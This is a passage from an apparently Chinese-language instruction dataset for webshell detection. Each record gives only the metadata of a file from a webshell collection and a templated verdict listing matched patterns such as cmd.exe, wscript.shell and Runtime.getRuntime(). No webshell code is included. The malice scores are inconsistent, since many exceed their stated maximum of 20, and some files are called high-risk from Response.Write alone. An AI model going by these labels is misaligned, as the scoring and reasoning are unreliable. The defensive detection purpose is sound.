\"文件类型\": \"asp\", \"文件大小\": \"46343 bytes\", \"行数\": 1047}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: cmd.Exe, Execute(, response.Write, CreateObject(, createObject( 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 63/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/WebAdmin 2.X Final.aspx", "malicious_score": 63, "md5_hash": "352a8a9c10c8551855412c07eca9798c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ASPX Shell.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"5110 bytes\", \"行数\": 161}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write, cmd.exe 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/ASPX Shell.aspx", "malicious_score": 30, "md5_hash": "8cd33d275d13d00eeaf3a3e88489a8fe"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"filesystembrowser.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"6945 bytes\", \"行数\": 207}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 48/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/filesystembrowser.aspx", "malicious_score": 48, "md5_hash": "fa0366e2cf46df761be83685b39f59b9"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ASPXspy.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"70372 bytes\", \"行数\": 2587}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/ASPXspy.aspx", "malicious_score": 36, "md5_hash": "07191f554ed5d9025bc85ee1bf51f975"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"冰锋刺客.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"70232 bytes\", \"行数\": 2579}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/冰锋刺客.aspx", "malicious_score": 36, "md5_hash": "a044b2459dab4e7240cb7703c98c6d91"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"上传马.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"319 bytes\", \"行数\": 9}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: request.form, response.write 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/上传马.aspx", "malicious_score": 9, "md5_hash": "8c4c606895210aa3e2f0324ea499ad91"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"hec.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"70368 bytes\", \"行数\": 2588}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/hec.aspx", "malicious_score": 36, "md5_hash": "b9cb0f9082ae34c342d87fec5cf2bd39"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"从注册表中读存在路径.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"5009 bytes\", \"行数\": 108}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/从注册表中读存在路径.aspx", "malicious_score": 6, "md5_hash": "f4b6773c752b5d53c4898cab21a4fdc8"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"view.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"59534 bytes\", \"行数\": 1685}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, Execute(, request.QueryString, Response.write, CreateObject( 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 426/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/view.aspx", "malicious_score": 426, "md5_hash": "1807b32abb9a7b604e366d7c8f2db1b2"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"WebSniff 1.0 Powered by C.C.T.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"20400 bytes\", \"行数\": 707}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.Form 具备文件操作能力: copy\\s*\\( 恶意度评分: 10/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/WebSniff 1.0 Powered by C.C.T.aspx", "malicious_score": 10, "md5_hash": "36e2234ad095998ac2f9064a17c5a021"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"awen asp.net webshell.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"1400 bytes\", \"行数\": 42}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, cmd.exe 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/awen asp.net webshell.aspx", "malicious_score": 12, "md5_hash": "5e83b6ed422399de04408b80f3e5470e"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ASP.NET Web BackDoor.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"120759 bytes\", \"行数\": 2941}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: cmd.Exe, wscript.shell, Request.QueryString, Response.Write, cmd.exe 恶意度评分: 447/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/ASP.NET Web BackDoor.aspx", "malicious_score": 447, "md5_hash": "34114faa30feb8dabc8074646c8c7937"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"fileupload.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"3932 bytes\", \"行数\": 126}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 54/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/fileupload.aspx", "malicious_score": 54, "md5_hash": "f6591c1ab7f7b782c386af1b6c2c0e9b"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"专版aspx汗血宝马.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"74763 bytes\", \"行数\": 2635}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/专版aspx汗血宝马.aspx", "malicious_score": 36, "md5_hash": "04fa9512c80c406bae8be3ecfd169576"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ASPXspy by NightRunner.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"50481 bytes\", \"行数\": 1596}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Cmd.exe, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/ASPXspy by NightRunner.aspx", "malicious_score": 27, "md5_hash": "4b646e7958e1bb00924b8e6598fe6670"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Command.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"2919 bytes\", \"行数\": 96}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, cmd.exe 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/Command.aspx", "malicious_score": 18, "md5_hash": "67af0bc97b3ea18025a88a0b0201c18d"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"SQL.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"3303 bytes\", \"行数\": 104}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/SQL.aspx", "malicious_score": 6, "md5_hash": "3125bf04153259891bf64e9ceaa95769"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"61207 bytes\", \"行数\": 1689}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, Execute(, request.QueryString, Response.write, CreateObject( 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 426/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Aspx/wso.aspx", "malicious_score": 426, "md5_hash": "d546b2c2b98d96c464652291a855b250"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"paxmac.jspx\", \"文件类型\": \"jsp\", \"文件大小\": \"897 bytes\", \"行数\": 35}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jspx/paxmac.jspx", "malicious_score": 9, "md5_hash": "ceb4f720f49a136fa660f87f7c2947cb"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd.jspx\", \"文件类型\": \"jsp\", \"文件大小\": \"922 bytes\", \"行数\": 24}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: exec(, Runtime.getRuntime() 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jspx/cmd.jspx", "malicious_score": 6, "md5_hash": "e8394312f094d66f53cdfdf52a4518e4"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"base64.jspx\", \"文件类型\": \"jsp\", \"文件大小\": \"922 bytes\", \"行数\": 24}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: exec(, Runtime.getRuntime() 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jspx/base64.jspx", "malicious_score": 6, "md5_hash": "e8394312f094d66f53cdfdf52a4518e4"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspspy.jspx\", \"文件类型\": \"jsp\", \"文件大小\": \"120947 bytes\", \"行数\": 3310}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 465/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jspx/jspspy.jspx", "malicious_score": 465, "md5_hash": "4b6f3a4482d92333a6fcaa2e618fe281"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspx.jspx\", \"文件类型\": \"jsp\", \"文件大小\": \"7586 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jspx/jspx.jspx", "malicious_score": 26, "md5_hash": "2f6144b84eec0cade35ea6dd330207e6"}} {"instruction": "分析这个perl文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pps-v4.0.pl\", \"文件类型\": \"perl\", \"文件大小\": \"57222 bytes\", \"行数\": 82}", "output": "这是一个perl类型的webshell文件。 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, ord\\s*\\( 包含网络功能: wget 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_perl_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Pl/pps-pl/pps-v4.0.pl", "malicious_score": 9, "md5_hash": "653708cd0967a66e14963467d7320ab6"}} {"instruction": "分析这个perl文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pps-v3.5.pl\", \"文件类型\": \"perl\", \"文件大小\": \"52052 bytes\", \"行数\": 79}", "output": "这是一个perl类型的webshell文件。 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 包含网络功能: wget 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_perl_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Pl/pps-pl/pps-v3.5.pl", "malicious_score": 7, "md5_hash": "56bc2906b6ea007ce117cfc87db055c9"}} {"instruction": "分析这个perl文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pps-v3.0.pl\", \"文件类型\": \"perl\", \"文件大小\": \"50894 bytes\", \"行数\": 78}", "output": "这是一个perl类型的webshell文件。 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 包含网络功能: wget 恶意度评分: 7/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_perl_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Pl/pps-pl/pps-v3.0.pl", "malicious_score": 7, "md5_hash": "c8a3147779d793e2974fbaaffd1ab4fc"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jpg_payload.php\", \"文件类型\": \"php\", \"文件大小\": \"4790 bytes\", \"行数\": 168}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_GET[, system(, file_get_contents( 发现混淆技术: ord\\s*\\( 具备文件操作能力: unlink\\s*\\(, file_put_contents 恶意度评分: 19/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/misc/jpg_payload.php", "malicious_score": 19, "md5_hash": "bad401daf062b88998f11b422938daff"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"struct.py\", \"文件类型\": \"python\", \"文件大小\": \"2970 bytes\", \"行数\": 99}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: compile( 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 恶意度评分: 22/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Udp/LiveHack/struct.py", "malicious_score": 22, "md5_hash": "f3f1fa89f3cd09524ebda765c6126dde"}} {"instruction": "分析这个python文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"livehack.py\", \"文件类型\": \"python\", \"文件大小\": \"5837 bytes\", \"行数\": 227}", "output": "这是一个python类型的webshell文件。 检测到恶意函数: exec(, Input( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_python_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Udp/LiveHack/livehack.py", "malicious_score": 6, "md5_hash": "9acafeb8de1ab5eddaded20f2af83521"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"新型JSP小马支持上传任意格式文件.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"306 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/新型JSP小马支持上传任意格式文件.jsp", "malicious_score": 6, "md5_hash": "b291bf3ccc9dac8b5c7e1739b8fa742e"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspy.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"40952 bytes\", \"行数\": 1219}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, ProcessBuilder( 具备文件操作能力: copy\\s*\\( 恶意度评分: 160/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/jspy.jsp", "malicious_score": 160, "md5_hash": "3087176c5faa192a5e557765beb0e823"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpy Private Codz By - Ninty.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"139002 bytes\", \"行数\": 3294}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 462/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/JspSpy Private Codz By - Ninty.jsp", "malicious_score": 462, "md5_hash": "a96a3ee7a0590c2cd4b1e098d0c4aea6"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"苦咖啡专用.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"42617 bytes\", \"行数\": 1311}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 52/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/苦咖啡专用.jsp", "malicious_score": 52, "md5_hash": "b5717fcd586edc7902057238807ba7cc"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jshell ver 0.1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"56060 bytes\", \"行数\": 1780}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/jshell ver 0.1.jsp", "malicious_score": 175, "md5_hash": "eebc60a70e1823f2aa519a57fb8992c7"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jshell ver 1.0.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"57582 bytes\", \"行数\": 1812}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/jshell ver 1.0.jsp", "malicious_score": 175, "md5_hash": "f35960c88fa07c121c8343ffc51327ee"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpy.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"148306 bytes\", \"行数\": 4237}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 462/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/JspSpy.jsp", "malicious_score": 462, "md5_hash": "47ebfd24d6161919fac44a59948245bc"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Command Execution (win32).jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"855 bytes\", \"行数\": 31}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/Command Execution (win32).jsp", "malicious_score": 15, "md5_hash": "c500cdc7ba1c9a3e26a5eab265ad48e1"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"login.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"55558 bytes\", \"行数\": 1148}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 215/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/login.jsp", "malicious_score": 215, "md5_hash": "f11ef32a76a638b58b35ebb51e03c939"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspHelper Codz By - Leo.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"86704 bytes\", \"行数\": 2328}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/JspHelper Codz By - Leo.jsp", "malicious_score": 315, "md5_hash": "f3af78fe43b362be54eeafa75a6a9b75"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"BackerHack JSP Manage-System 1.0.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"36164 bytes\", \"行数\": 862}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 恶意度评分: 117/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/BackerHack JSP Manage-System 1.0.jsp", "malicious_score": 117, "md5_hash": "568a5d4452852148944d122e8e8cf156"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JSP Backdoor Reverse Shell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2451 bytes\", \"行数\": 91}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/JSP Backdoor Reverse Shell.jsp", "malicious_score": 12, "md5_hash": "8b0e6779f25a17f0ffb3df14122ba594"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"灭天远程管理.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"52334 bytes\", \"行数\": 1684}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 116/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/灭天远程管理.jsp", "malicious_score": 116, "md5_hash": "a488ea6d0cdc04c9c24a651918bbf09a"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"内网探测.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"15591 bytes\", \"行数\": 564}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 包含网络功能: HttpURLConnection 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/内网探测.jsp", "malicious_score": 37, "md5_hash": "7778c8eabcc95598edf8771f4e41bc62"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JSP Shell 岁月联盟专用版本.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"31023 bytes\", \"行数\": 994}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/JSP Shell 岁月联盟专用版本.jsp", "malicious_score": 37, "md5_hash": "450ab7e8b1cd9ebb09b4fe7d4fcf353c"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Jspspy web~shell V1.0 ※MADE by 孤水绕城 QQ540410588.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"43119 bytes\", \"行数\": 1064}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 121/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": 